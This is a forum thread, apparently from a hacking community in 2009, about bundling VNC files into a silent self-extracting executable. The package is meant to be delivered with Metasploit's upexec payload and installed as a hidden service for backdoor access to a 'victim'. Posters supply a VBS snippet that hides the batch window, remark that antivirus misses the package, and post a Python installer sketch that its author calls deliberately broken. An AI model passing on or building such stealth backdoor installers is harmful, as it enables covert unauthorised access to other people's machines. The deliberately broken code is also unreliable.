Deathray Posted April 6, 2009 Posted April 6, 2009 Hi people. I would be so grateful for help with my situation. I have 4 files. install.bat VNCHOOKS.DLL WINVNC.EXE VNC.REG Is there any way to combine these 4 files into a single, self extracting .exe file which executes install.bat silently? The reason being is because I am using the windows/upexec payload in Metasploit and want to install VNC as a service silently when executed for use future backdoor use. Quote
gEEEk Posted April 6, 2009 Posted April 6, 2009 I think a WinRAR SFX archive might be what you're looking for. It will compress and make all your files to a single executable which can run a file after the extraction. Quote
Deathray Posted April 6, 2009 Author Posted April 6, 2009 I think a WinRAR SFX archive might be what you're looking for. It will compress and make all your files to a single executable which can run a file after the extraction. Oh .. my... god! EXACTLY what I was looking for... 1 last problem - when the batch file gets executed the cmd.exe window pop's up - any way to hide that? Thanks in advance!! :):) Quote
Deathray Posted April 6, 2009 Author Posted April 6, 2009 Never mind I found a quick solution :) Instead of 4 files I have 5 files. A new one called install.vbs It contains this: Set WshShell = CreateObject("WScript.Shell") cmds=WshShell.RUN(".\install.bat", 0, True) Set WshShell = Nothing Now the batch file is completely invisible haha this is so cool :D Thanks you soooo much for your help :) Quote
freeb Posted April 6, 2009 Posted April 6, 2009 I'm sure Darren did a segment about something like this in a previous season. Quote
Deathray Posted April 6, 2009 Author Posted April 6, 2009 I'm sure Darren did a segment about something like this in a previous season. A link would be great there are so many videos :P Quote
Deathray Posted April 6, 2009 Author Posted April 6, 2009 Start -> Run -> iexpress.exe Been there, done that. iexpress.exe has some limits in the way it works. Not going to explain why but basically it sucks :P Quote
Zimmer Posted April 7, 2009 Posted April 7, 2009 ya Darren did a segment Darren builds a one-click remote assistance package to help save the holidays link to episode page http://www.hak5.org/episodes/episode-3x05-release mp4 file http://www.podtrac.com/pts/redirect.mp4?ht...-3x05--ipod.mp4 Enjoy! Quote
DingleBerries Posted April 7, 2009 Posted April 7, 2009 Nice try USBHACKER! lol no but you can do all of that in less than 20lines of python and still hide the cmd window. You have to many files running, its just to sloppy. Quote
Deathray Posted April 7, 2009 Author Posted April 7, 2009 Nice try USBHACKER! lol no but you can do all of that in less than 20lines of python and still hide the cmd window. You have to many files running, its just to sloppy. lol yeah I did steal the batch + vnc from gonzors payload :D ... But I thought it was great because it installs itself as a service and no AntiVirus detect it as a virus plus windows firewall doesent seem to care VNC binding to a port :) Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, which is not realistic and I want my lab to be realistic :). Thanks Zimmer for the link. Hope you didn't use any more time than I would of if I looked for it by myself. Quote
DingleBerries Posted April 7, 2009 Posted April 7, 2009 Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, Nope, just turn the python code into and executable and it will run under almost any windows system. Quote
Deathray Posted April 8, 2009 Author Posted April 8, 2009 Nope, just turn the python code into and executable and it will run under almost any windows system. Wouldnt that be more sloppy as it would require the executable file to contain the entire python runtime? Quote
DingleBerries Posted April 8, 2009 Posted April 8, 2009 Wouldnt that be more sloppy as it would require the executable file to contain the entire python runtime? Nope, as a matter of fact I am making an exe to do all this atm. I will post the link to it later. Source: VNC.exe import os, from ConfigParser import ConfigParser config.read('vnc.cfg') newpath = config.get('Move To', 'Location') vncauth = config.get('VNC Auth', 'Password') if not os.path.isdir(newpath): srcname = "winvnc.exe" srcname = "hooks.dll" shutil.copy(srcname, newpath) shutil.copy(srcname1, newpath) f = open("VNC.reg", 'r') f.write('Windows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC][HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]\n') f.write(vncauth) f.write('REG SHIT') f.close() reg=os.popen3('VNC.reg','b') runvnc=os.popen3(newpath + 'winvnc4.exe','b') VNC.cfg [Move To] Location: C:\VNC [VNC Auth] Password: “Password”=hex:HEX COMMA SEPARATED PASS Ask for permission to edit the registry but you get the idea. Less than 1MB and you can do pretty much what you want with it. Code is sloppy, missing shit and doesnt work on purpose. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.